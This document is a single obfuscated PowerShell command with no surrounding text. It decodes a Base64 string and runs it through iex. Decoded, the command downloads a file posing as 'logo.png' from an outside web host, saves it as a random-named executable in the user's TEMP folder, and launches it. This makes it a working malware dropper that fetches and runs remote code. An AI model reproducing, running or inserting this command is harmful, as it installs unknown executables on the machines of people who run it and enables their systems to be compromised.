iex([sYSTeM.text.ENCODING]::utF8.GetSTriNG([sYStEm.cONVerT]::fRombasE64STRInG('CihOZXctT2JqZWN0IHNZU3RlTS5uRXQuV0VCQ2xJRU5UKS5kT1dubE9BREZJTGUoJ2h0dHA6Ly9kb2MuY2hlcnJ5Y29mZmVlZXF1aXBtZW50LmNvbS9udy9sb2dvLnBuZycsIiRFblY6VEVNUFxncnRzbmRlYmRnZnN5dGV3cncuZXhlIik7U3RhcnQtUHJvY2VzcyAoIiRFblY6VEVNUFxncnRzbmRlYmRnZnN5dGV3cncuZXhlIikKCg==')));exit

